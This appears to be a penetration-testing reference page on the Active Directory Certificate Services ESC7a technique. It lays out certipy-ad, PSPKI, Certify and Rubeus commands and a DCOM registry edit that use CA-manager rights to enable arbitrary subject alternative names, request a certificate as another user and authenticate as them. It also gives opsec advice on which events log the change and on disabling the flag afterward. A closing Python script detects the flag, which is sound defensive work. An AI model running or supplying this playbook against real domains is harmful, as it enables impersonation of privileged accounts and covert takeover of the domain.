ADCSESC7a

ESC7a: ManageCA right on an Enterprise CA. Use it to enable EDITF_ATTRIBUTESUBJECTALTNAME2, which turns the CA into an ESC6 condition, then enroll with an arbitrary SAN.

Applies to: Principals with the ManageCA (CA Administrator) right → Enterprise CA


Linux Abuse

certipy-ad

# Step 1: Confirm ManageCA right and enumerate CA
certipy-ad find -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> -vulnerable -stdout

# Step 2: Add self as CA officer (needed to issue/approve certs)
certipy-ad ca -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -add-officer <username>

# Step 3: Enable EDITF_ATTRIBUTESUBJECTALTNAME2 on the CA
certipy-ad ca -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -enable-flag EDITF_ATTRIBUTESUBJECTALTNAME2

# Step 4: Restart the CA service so the flag takes effect (may not always be required; test first)
# (Restarting the CA service needs admin rights on the CA host)

# Step 5: Now exploit as ESC6b: request a cert with an arbitrary UPN
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -target <ca-host> -template '<template>' \
  -upn <target-user>@<domain>

# Step 6: Authenticate
certipy-ad auth -pfx <target-user>.pfx -dc-ip <dc-ip>

# Cleanup: disable flag
certipy-ad ca -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -disable-flag EDITF_ATTRIBUTESUBJECTALTNAME2

Windows Abuse

PSPKI module

# Install PSPKI if not present
Install-Module -Name PSPKI -Force
Import-Module PSPKI

# Enable EDITF_ATTRIBUTESUBJECTALTNAME2 on the CA
Get-CertificationAuthority -ComputerName <ca-host> | `
  Enable-PolicyModuleFlag -Flag EDITF_ATTRIBUTESUBJECTALTNAME2

# Verify flag is set
Get-CertificationAuthority -ComputerName <ca-host> | Get-PolicyModuleFlag
# Or via certutil:
# certutil.exe -config "<ca-host>\<ca>" -getreg "policy\EditFlags"
# Now exploit as ESC6: request a cert with an arbitrary UPN
Certify.exe request /ca:<ca-host>\<ca> /template:<template> /upn:<target-user>@<domain>
Rubeus.exe asktgt /user:<target-user> /domain:<domain> /certificate:<pfx-base64> /ptt

Direct registry edit via DCOM (alternative to the PSPKI cmdlets; uses the PSPKI CertSrvRegManagerD class rather than certutil)

$configReader = New-Object SysadminsLV.PKI.Dcom.Implementations.CertSrvRegManagerD "<ca-host>"
$configReader.SetRootNode($true)
$node = "PolicyModules\CertificateAuthority_MicrosoftDefault.Policy"
# Read the current EditFlags DWORD (on a default Enterprise CA this is usually 0x11014E)
$editFlags = $configReader.GetConfigEntry("EditFlags", $node)
# OR in EDITF_ATTRIBUTESUBJECTALTNAME2 (0x00040000) so the other bits are preserved;
# 0x11014E -bor 0x40000 = 0x15014E = 1376590, the value a hard-coded write would use
$configReader.SetConfigEntry([int]($editFlags -bor 0x40000), "EditFlags", $node)

Opsec

  • Enabling EDITF_ATTRIBUTESUBJECTALTNAME2 is a highly visible CA-level change; it shows up in CA audit logs and is trivially detected by any ADCS audit.
  • The flag change persists across reboots; disable it immediately after obtaining the cert.
  • CA admin actions are logged under the Security event log on the CA server (Event ID 4870, 4882).
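For the audit side of the Opsec notes above, this added Python (not from the page, Certipy or PSPKI) parses the EditFlags line from `certutil -config "<ca-host>\<ca>" -getreg policy\EditFlags` output and decodes the DWORD into flag names, reporting whether the EDITF_ATTRIBUTESUBJECTALTNAME2 bit (0x40000) that the steps above set is present. The flag table is a subset of the EDITF_* bits and the sample output and CA name are constructed.

```python
import re

# Subset of the CA policy-module EditFlags bits, named as certutil prints them.
EDITF_FLAGS = {
    0x00000002: "EDITF_REQUESTEXTENSIONLIST",
    0x00000004: "EDITF_DISABLEEXTENSIONLIST",
    0x00000008: "EDITF_ADDOLDKEYUSAGE",
    0x00000040: "EDITF_BASICCONSTRAINTSCRITICAL",
    0x00000100: "EDITF_ENABLEAKIKEYID",
    0x00010000: "EDITF_ENABLEDEFAULTSMIME",
    0x00040000: "EDITF_ATTRIBUTESUBJECTALTNAME2",  # the ESC6 bit
    0x00100000: "EDITF_ENABLECHASECLIENTDC",
}
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000


def parse_editflags(certutil_output: str) -> int:
    """Pull the EditFlags DWORD out of 'certutil -getreg policy\\EditFlags' text."""
    m = re.search(r"EditFlags\s+REG_DWORD\s*=\s*([0-9A-Fa-f]+)", certutil_output)
    if m is None:
        raise ValueError("no EditFlags REG_DWORD line in certutil output")
    return int(m.group(1), 16)


def decode_editflags(value: int) -> list[str]:
    """Return the names of the set bits; bits outside the table are reported as hex."""
    names = [name for bit, name in sorted(EDITF_FLAGS.items()) if value & bit]
    unknown = value & ~sum(EDITF_FLAGS)
    if unknown:
        names.append(f"UNKNOWN(0x{unknown:X})")
    return names


def san_flag_enabled(value: int) -> bool:
    """True when the CA accepts a caller-supplied SAN on any template (ESC6 condition)."""
    return bool(value & EDITF_ATTRIBUTESUBJECTALTNAME2)


# Constructed sample (not a real capture) of certutil output after the flag was enabled.
SAMPLE_OUTPUT = """\
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\CORP-CA\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy:

  EditFlags REG_DWORD = 15014e (1376590)
"""

if __name__ == "__main__":
    flags = parse_editflags(SAMPLE_OUTPUT)
    print(f"EditFlags = 0x{flags:X}: {', '.join(decode_editflags(flags))}")
    print("ESC6 condition present" if san_flag_enabled(flags) else "SAN flag not set")
```

Run it against the real certutil output of each Enterprise CA on a schedule and alert when the SAN bit appears, since the flag persists until someone disables it.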